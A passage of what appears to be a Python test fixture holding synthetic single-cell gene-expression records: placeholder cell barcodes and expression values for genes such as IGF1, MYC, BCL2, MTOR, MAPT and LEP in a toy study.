"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IGF1 Expression": {
"name": "IGF1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.81,
3.0,
1.0,
2.58,
2.58,
2.81,
1.58,
2.32,
2.81,
1.58,
1.58,
3.0,
2.0,
2.0,
2.58,
2.81,
2.0,
2.81,
2.81,
2.32,
1.58,
2.81,
2.0,
2.58,
1.58,
2.0,
1.0,
2.58,
2.32,
2.58,
1.0,
2.0,
2.32,
2.32,
1.0,
1.58,
2.58,
1.0,
3.0,
2.0,
2.0,
1.58,
3.0,
2.81,
2.32,
2.58,
2.32,
2.81,
2.81,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MYC Cells": {
"name": "MYC Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MYC Expression": {
"name": "MYC Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
1.58,
1.58,
3.0,
1.0,
2.58,
2.0,
2.0,
2.58,
2.32,
1.58,
3.0,
2.58,
1.58,
2.32,
2.32,
2.32,
2.32,
1.0,
1.0,
1.0,
2.58,
2.81,
2.58,
2.0,
2.32,
2.0,
1.58,
1.58,
3.0,
2.81,
1.0,
2.58,
2.58,
2.81,
1.0,
2.32,
2.0,
2.32,
2.81,
1.0,
1.0,
2.0,
1.0,
1.0,
3.0,
1.58,
2.0,
3.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTM1 Cells": {
"name": "GSTM1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"GSTM1 Expression": {
"name": "GSTM1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.0,
1.0,
1.58,
2.32,
2.81,
2.81,
2.81,
1.58,
2.0,
1.58,
2.81,
2.32,
2.58,
1.0,
3.0,
2.58,
2.32,
1.58,
3.0,
3.0,
1.0,
2.58,
2.81,
2.0,
2.0,
2.0,
2.81,
3.0,
2.58,
1.0,
2.32,
2.81,
2.0,
1.58,
1.58,
2.58,
2.58,
2.81,
2.58,
2.0,
2.0,
3.0,
1.0,
3.0,
2.32,
1.58,
2.81,
1.58,
1.0,
1.58,
2.32,
2.32,
3.0,
2.81,
1.0,
2.58,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BCL2 Cells": {
"name": "BCL2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BCL2 Expression": {
"name": "BCL2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.58,
2.32,
2.58,
2.58,
2.81,
2.81,
1.58,
1.0,
1.58,
2.58,
2.81,
1.0,
2.32,
2.58,
1.0,
3.0,
1.0,
2.32,
1.58,
1.0,
2.58,
1.58,
2.81,
1.0,
2.32,
2.58,
1.58,
1.58,
1.0,
2.81,
1.0,
2.58,
2.32,
1.58,
3.0,
2.32,
1.0,
2.81,
1.0,
1.58,
1.58,
2.32,
3.0,
2.32,
2.58,
1.58,
2.58,
2.32,
1.0,
1.58,
2.58,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MTOR Cells": {
"name": "MTOR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MTOR Expression": {
"name": "MTOR Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.0,
2.58,
2.0,
2.0,
2.0,
2.0,
2.81,
2.0,
1.58,
2.81,
1.58,
2.32,
2.32,
3.0,
1.58,
3.0,
2.32,
2.58,
2.58,
3.0,
1.58,
1.58,
2.32,
2.32,
2.32,
2.32,
1.58,
2.81,
2.0,
1.0,
1.0,
1.0,
1.0,
3.0,
1.58,
2.32,
1.58,
2.32,
2.0,
2.32,
1.58,
1.58,
1.58,
2.81,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MAPT Cells": {
"name": "MAPT Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_1CAABBBADBDADCBC-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MAPT Expression": {
"name": "MAPT Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.58,
2.81,
1.58,
2.81,
3.0,
3.0,
1.58,
2.0,
1.0,
2.0,
2.58,
3.0,
2.32,
1.0,
2.58,
2.0,
2.0,
2.81,
2.32,
2.0,
1.0,
2.0,
2.0,
2.32,
3.0,
2.32,
2.0,
2.32,
2.32,
2.81,
2.0,
2.0,
1.58,
1.58,
1.0,
3.0,
2.0,
1.0,
2.58,
2.0,
2.58,
1.0,
2.58,
2.58,
2.58,
2.81,
2.81,
2.32,
2.58,
3.0,
3.0,
2.0,
2.32,
1.0,
1.0,
2.0,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"LEP Cells": {
"name": "LEP Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
